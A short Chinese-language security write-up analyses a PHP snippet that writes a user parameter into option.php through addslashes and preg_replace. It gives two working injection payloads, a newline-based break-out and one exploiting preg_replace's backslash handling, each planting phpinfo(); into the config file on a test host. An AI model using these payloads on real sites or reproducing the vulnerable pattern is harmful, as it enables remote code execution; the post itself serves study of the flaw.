小密圈专题(1)-配置文件写入问题

p师傅的小密圈的一个问题

<?php
$str = addslashes($_GET['option']);
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('xxxxx/option.php', $file);

这个场景十分经典，常用在修改配置文件写入，但是又需要做一定的防御。

法一(利用正则的.*、单引号)：

http://love.lemon:82/test/test.php?option=aaa';%0aphpinfo();//
http://love.lemon:82/test/test.php?option=a

这个其实是利用了正则的匹配问题，因为仔细研究一下，可以看到正则匹配的是

$option='任意内容';

如果输入aaaaa';xxxxx经过addslashes的单引号处理，成为\'

最后也就是$option='aaaaa\';xxxxx';

正则匹配的会是啥?＝。＝，其实最后还是能全部匹配到的，也就是aaaaa\';xxxxx';
当然最后通过注入了换行符突破，当然还需要再访问一次

http://love.lemon:82/test/test.php?option=a

通过正则将\替换掉

法二(利用preg_replace的转义)：

http://love.lemon:82/test/test.php?option=aaa\';phpinfo();//

其中红色的框框中是经过preg_replace替换后的$file

可以看到与一开始经过addslashes函数处理后的aa\\\'三个\变成了两个\
猜测应该是preg_replace还是做了转义的处理，导致如此的一个变化，所以最后写入文件的也就是$option='aaa\\';phpinfo()//';